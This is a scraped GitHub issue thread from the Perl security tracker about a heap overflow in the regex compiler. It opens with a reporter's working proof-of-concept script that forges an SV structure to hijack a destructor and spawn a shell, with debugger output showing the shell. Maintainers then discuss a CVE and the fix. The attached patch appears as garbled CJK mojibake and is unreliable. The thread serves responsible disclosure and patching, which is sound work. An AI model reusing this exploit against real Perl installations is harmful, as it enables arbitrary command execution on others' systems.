return $ret\u003cbr\u003e\n}\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $cmd = 'gdb -x gdbcmd -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -e ';\u003cbr\u003e\nmy $prefix = '\\'my $r = \"(?[(?x:(?[\\\\\\\\a]))\\\\\\\\]X';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $addr = 0xbacbfc; # overwrite start addr\u003cbr\u003e\n # search with:\u003cbr\u003e\n # (gdb) b regcomp.c:13904\u003cbr\u003e\n # (gdb) p s\u003cbr\u003e\n # [CAUTION] must not contain ']' (0x5d)\u003cbr\u003e\n #\u003cbr\u003e\nmy $addr_sv_any = $addr + 8 + 4 + 4 + 8;\u003cbr\u003e\nmy $addr_stash = $addr_sv_any + 8 + 8 + 8;\u003cbr\u003e\nmy $addr_stash_any = $addr_stash + 8 + 4 + 4;\u003cbr\u003e\nmy $addr_magic = $addr_stash + 8 + 4 + 4 + 8 + 8 + 20 + 8;\u003cbr\u003e\nmy $addr_mg_virtual = $addr_magic + 8 + 8 + 2 + 1 + 1 + 8 + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# $ nm /path/to/perl | grep Perl_eval_sv\u003cbr\u003e\nmy $addr_eval_sv = 0x46a576;\u003cbr\u003e\nmy $addr_system_sh = $addr_stash_any + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $body = ''\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# sv($addr) obj\u003cbr\u003e\n. h2s($addr_sv_any, 8)\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# sv_flags\u003cbr\u003e\n# - SVt_PVMG || SVs_OBJECT : to call SvREFCNT_dec_NN at\u003cbr\u003e\ndo_clean_named_objs()\u003cbr\u003e\n# - SVf_POK || SVp_POK : to use as SVPV in eval_sv\u003cbr\u003e\n. h2s(0x104407, 4)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# sv_u.svu_pv : ptr to \"system sh\"\u003cbr\u003e\n. h2s($addr_system_sh, 8)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# any($addr_sv_any)\u003cbr\u003e\n. h2s($addr_stash, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($addr_magic, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003cbr\u003e\n. h2s(length(\"system sh\"), 8) # STRLEN xpv_cur\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e## xmg_stash($addr_stash)\u003cbr\u003e\n. h2s($addr_stash_any, 8) # sv_any\u003cbr\u003e\n. h2s(0x02, 4) # sv_refcnt (not 0x01: SVt_PVHV can not\u003cbr\u003e\nbypass assertion in eval_sv)\u003cbr\u003e\n. h2s(0x0c, 4) # sv_flags (SVt_PVHV)\u003cbr\u003e\n## any($addr_stash_any)\u003cbr\u003e\n. h2s(0x00, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($addr_magic, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# $addr_system_sh\u003cbr\u003e\n. \"system sh\\\\x00\"\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. \"A\" x 10 # padding\u003cbr\u003e\n. h2s($addr, 8) # OVERWRITE gvp (addr + 100)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_magic($addr_magic)\u003cbr\u003e\n. h2s(0x00, 8) # MAGIC* mg_moremagic;\u003cbr\u003e\n#\u003cbr\u003e\n. h2s($addr_mg_virtual, 8) # MGVTBL* mg_virtual /* pointer to magic\u003cbr\u003e\nfunctions */\u003cbr\u003e\n#\u003cbr\u003e\n. h2s(0x00, 2) # U16 mg_private;\u003cbr\u003e\n. h2s(0x00, 1) # char mg_type;\u003cbr\u003e\n. h2s(0x00, 1) # U8 mg_flags;\u003cbr\u003e\n. h2s(0x00, 8) # SSize_t mg_len;\u003cbr\u003e\n. h2s(0x00, 8) # SV* mg_obj;\u003cbr\u003e\n. h2s(0x00, 8) # char* mg_ptr;\u003cbr\u003e\n#\u003cbr\u003e\n## mg_virual($addr_mg_virtual)\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_get) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_set) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # U32 (*svt_len) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_clear)(pTHX_ SV *sv, MAGIC* mg);\u003cbr\u003e\n. h2s($addr_eval_sv, 8) # int (*svt_free) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. '])'\u003cbr\u003e\n. \"B\" x 20 # control gvp allocation\u003cbr\u003e\n. '\"; qr/$r/\\'';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $payload = $prefix . $body;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eprint $cmd . $payload . \"\\n\";\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- output\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n[eiichi@x1 exploit]$ cat gdbcmd\u003cbr\u003e\nb regcomp.c:13904\u003cbr\u003e\nrun\u003cbr\u003e\nl\u003cbr\u003e\np s\u003cbr\u003e\ndis br 1\u003cbr\u003e\nc\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e[eiichi@x1 exploit]$ gdb -x gdbcmd -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -e 'my $r =\u003cbr\u003e\n\"(?[(?x:(?[\\\\a]))\\\\]X\\x14\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x44\\x10\\x00\\x4c\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x2c\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x68\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x68\\xcc\\xba\\x00\\x00\\x00\\x00\\x00system\u003cbr\u003e\nsh\\x00AAAAAAAAAA\\xfc\\xcb\\xba\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x94\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x76\\xa5\\x46\\x00\\x00\\x00\\x00\\x00])BBBBBBBBBBBBBBBBBBBB\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\nReading symbols from\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl...done.\u003cbr\u003e\nBreakpoint 1 at 0x5395ed: file regcomp.c, line 13904.\u003cbr\u003e\n[Thread debugging using libthread_db enabled]\u003cbr\u003e\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?x:(?[\\a]))\\]X̺DL̺,̺h̺ \u0026lt;̺\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e h̺system\u003cbr\u003e\nshAAAAAAAAAA?˺?̺v?F])BBBBBBBBBBBBBBBBBBBB/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?x:(?[ \u0026lt;-- HERE \\a]))\\]X̺DL̺,̺h̺ \u0026lt;̺\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e h̺system\u003cbr\u003e\nshAAAAAAAAAA?˺?̺v?F])BBBBBBBBBBBBBBBBBBBB/ at -e line 1.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 1, S_regatom (pRExC_state=0x7fffffffcc80, flagp=0x7fffffffc220,\u003cbr\u003e\ndepth=4) at regcomp.c:13904\u003cbr\u003e\n13904 *(s++) = (char) ender;\u003cbr\u003e\n13899 U8 * new_s = uvchr_to_utf8((U8*)s,\u003cbr\u003e\nender);\u003cbr\u003e\n13900 added_len = (char *) new_s - s;\u003cbr\u003e\n13901 s = (char *) new_s;\u003cbr\u003e\n13902 }\u003cbr\u003e\n13903 else {\u003cbr\u003e\n13904 *(s++) = (char) ender;\u003cbr\u003e\n13905 }\u003cbr\u003e\n13906 }\u003cbr\u003e\n13907 }\u003cbr\u003e\n13908 else if (LOC \u0026amp;\u0026amp;\u003cbr\u003e\nis_PROBLEMATIC_LOCALE_FOLD_cp(ender)) {\u003cbr\u003e\n$1 = 0xbacbfc \"\"\u003cbr\u003e\npanic: reg_node overrun trying to emit 0, baccc0\u0026gt;=bacc14 at -e line 1.\u003cbr\u003e\nDetaching after fork from child process 12813.\u003cbr\u003e\nsh-4.4$ date\u003cbr\u003e\n2018年 9月 24日 月曜日 19:11:34 JST\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e2018年9月24日(月) 15:41 Tony Cook via RT \u0026lt;\u003cbr\u003e\nperl5-security-report-followup@perl.org\u0026gt;:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 29 Aug 2018 23:52:16 -0700, public@khwilliamson.com wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn 08/27/2018 07:16 AM, Eiichi Tsukata wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a regexp which executes arbitrary\u003cbr\u003e\ncommand\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on\u003cbr\u003e\noverwritten heap which has the malicious svt_free(shell_code) on its\u003cbr\u003e\nmagic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- must set `execstack -s` to perl\u003cbr\u003e\n- require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eShouldn't this be getting a CVE?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eI plan to request a CVE ID for this issue in the next couple of days.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf anyway has already requested an ID, please let me know.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e\n\u003c/blockquote\u003e","bodyVersion":"1f72860f62be80174c5a1e4b16b8b48d5ba09dd6d6a84cdbf9eade6f1f9abcf0","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097452","createdAt":"2018-09-24T10:26:38Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgsd2zAAqTU0NDA5NzQ1Mg=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097453,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1Mw==","body":"### From @khwilliamson\n\nOn 09/19/2018 06\u0026#8203;:28 PM\\, Tony Cook via RT wrote\u0026#8203;:\n\u003e On Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e\u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e\u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e\u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e\u003e instead of a literal\\.\n\u003e\u003e\n\u003e\u003e The fix is to remove the single line that incorrectly increments the\n\u003e\u003e parse pointer\\.\n\u003e\u003e I don't know that this being an experimental feature has any bearing\n\u003e\u003e on it\\.\n\u003e\u003e\n\u003e\u003e There is another thing\\. The minus sign in this case could have been\n\u003e\u003e caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if\n\u003e\u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \n\u003e Could you please make patches against blead/maint\\-5\\.28/maint\\-5\\.26 for this?\n\u003e \n\u003e Thanks\\,\n\u003e Tony\n\u003e \n\nAttached","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn 09/19/2018 06:28 PM, Tony Cook via RT wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eCould you please make patches against blead/maint-5.28/maint-5.26 for this?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eAttached\u003c/p\u003e","bodyVersion":"995f2a740595a2f93d62e695a796bc46ba643910146a42f2d1f1f4083669ded3","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097453","createdAt":"2018-09-24T18:01:56Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgy-siAAqTU0NDA5NzQ1Mw=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097454,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1NA==","body":"### From @khwilliamson\n\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\n```diff\n䙲潭昲㠵㡥愲㡥戲挷攰ち㑢搶愵敤㤵攴㜸㉦㠸㌳㌠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺ㔴㨴ㄠⴰ㘰《卵扪散琺⁛偁呃䠠㈴㈯㈴㉝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝潲‵⸲㘠浡楮琊ਭⴭਠ牥杣潭瀮挠†††簠ㄠⴊ⁴⽲支牥束浥獧⁼‴⬫⬊′楬敳桡湧敤Ⱐ㐠楮獥牴楯湳⠫⤬‱敬整楯渨ਊ摩晦ⵧ楴⽲敧捯浰⽲敧捯浰੩湤數愴㝤户㔷㌮⸴㌱〰㙥㠵㔠〶㐴ਭⴭ⽲敧捯浰ਫ⬫⽲敧捯浰ੀ䀠ⴱ㔱〹ⰷㄵ㤬㘠䁀敤潟捵牣桡爺ਠ††††††††††剅硃彰慲獥⬫㬊††††††††††獳敲琨啃䡁剁吨剅硃彰慲獥⤠㴽‧⤧⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††潴漠桡湤汥彯灥牡湤㬊††††††††⁽楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌹捦捦㝤昱⸮搲㙡㝣慦㌷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀㘬㘠⬱〶ⰸ⁀䀠浹․桩杨彭楸敤彤楧楴‽\u2028❁✠汴‧〧⤠㼠✰✠㨠❁✻ਠ浹․捯汯湟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨∺∩㬊礠⑴慢彨數‽灲楮瑦•┰㉘∬牤⠢屴∩㬊 ⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊‣⌊‣⌠䭥礭癡汵攠灡楲猠潦潤支敲牯爠潦潤攠瑨慴桯畬搠桡癥慴慬牲潲献ਠ⌣ੀ䀠ⴲ㤰ⰶ㈹㈬㠠䁀礠䁤敡瑨‽ਠ‧⼨㽸浳楸瀩慢振✠㴾•∬ਠ‧⼨㽸硸砺慢挩⼧‽㸠∢Ⰺ†✯⠿㰽⼧‽㸠❓敱略湣攠⠿⸮⸠湯琠瑥牭楮慴敤⁻⍽⼨㼼㵻⍽⼧Ⱐ†††††††††††‣⁛灥牬‣ㄲ㠱㜰崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ⬊ \u2029㬊 ⴭ ㈮ㄷ⸱ਊ\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"䙲潭昲㠵㡥愲㡥戲挷攰ち㑢搶愵敤㤵攴㜸㉦㠸㌳㌠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺ㔴㨴ㄠⴰ㘰《卵扪散琺⁛偁呃䠠㈴㈯㈴㉝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝潲‵⸲㘠浡楮琊ਭⴭਠ牥杣潭瀮挠†††簠ㄠⴊ⁴⽲支牥束浥獧⁼‴⬫⬊′楬敳桡湧敤Ⱐ㐠楮獥牴楯湳⠫⤬‱敬整楯渨ਊ摩晦ⵧ楴⽲敧捯浰⽲敧捯浰੩湤數愴㝤户㔷㌮⸴㌱〰㙥㠵㔠〶㐴ਭⴭ⽲敧捯浰ਫ⬫⽲敧捯浰ੀ䀠ⴱ㔱〹ⰷㄵ㤬㘠䁀敤潟捵牣桡爺ਠ††††††††††剅硃彰慲獥⬫㬊††††††††††獳敲琨啃䡁剁吨剅硃彰慲獥⤠㴽‧⤧⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††潴漠桡湤汥彯灥牡湤㬊††††††††⁽楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌹捦捦㝤昱⸮搲㙡㝣慦㌷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀㘬㘠⬱〶ⰸ⁀䀠浹․桩杨彭楸敤彤楧楴‽\u2028❁✠汴‧〧⤠㼠✰✠㨠❁✻ਠ浹․捯汯湟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨∺∩㬊礠⑴慢彨數‽灲楮瑦•┰㉘∬牤⠢屴∩㬊 ⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊‣⌊‣⌠䭥礭癡汵攠灡楲猠潦潤支敲牯爠潦潤攠瑨慴桯畬搠桡癥慴慬牲潲献ਠ⌣ੀ䀠ⴲ㤰ⰶ㈹㈬㠠䁀礠䁤敡瑨‽ਠ‧⼨㽸浳楸瀩慢振✠㴾•∬ਠ‧⼨㽸硸砺慢挩⼧‽㸠∢Ⰺ†✯⠿㰽⼧‽㸠❓敱略湣攠⠿⸮⸠湯琠瑥牭楮慴敤⁻⍽⼨㼼㵻⍽⼧Ⱐ†††††††††††‣⁛灥牬‣ㄲ㠱㜰崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ⬊ \u2029㬊 ⴭ ㈮ㄷ⸱ਊ\"\u003e\u003cpre class=\"notranslate\"\u003e䙲潭昲㠵㡥愲㡥戲挷攰ち㑢搶愵敤㤵攴㜸㉦㠸㌳㌠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺ㔴㨴ㄠⴰ㘰《卵扪散琺⁛偁呃䠠㈴㈯㈴㉝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝潲‵⸲㘠浡楮琊ਭⴭਠ牥杣潭瀮挠†††簠ㄠⴊ⁴⽲支牥束浥獧⁼‴⬫⬊′楬敳桡湧敤Ⱐ㐠楮獥牴楯湳⠫⤬‱敬整楯渨ਊ摩晦ⵧ楴⽲敧捯浰⽲敧捯浰੩湤數愴㝤户㔷㌮⸴㌱〰㙥㠵㔠〶㐴ਭⴭ⽲敧捯浰ਫ⬫⽲敧捯浰ੀ䀠ⴱ㔱〹ⰷㄵ㤬㘠䁀敤潟捵牣桡爺ਠ††††††††††剅硃彰慲獥⬫㬊††††††††††獳敲琨啃䡁剁吨剅硃彰慲獥⤠㴽‧⤧⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††潴漠桡湤汥彯灥牡湤㬊††††††††⁽楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌹捦捦㝤昱⸮搲㙡㝣慦㌷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀㘬㘠⬱〶ⰸ⁀䀠浹․桩杨彭楸敤彤楧楴‽\u2028❁✠汴‧〧⤠㼠✰✠㨠❁✻ਠ浹․捯汯湟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨∺∩㬊礠⑴慢彨數‽灲楮瑦•┰㉘∬牤⠢屴∩㬊 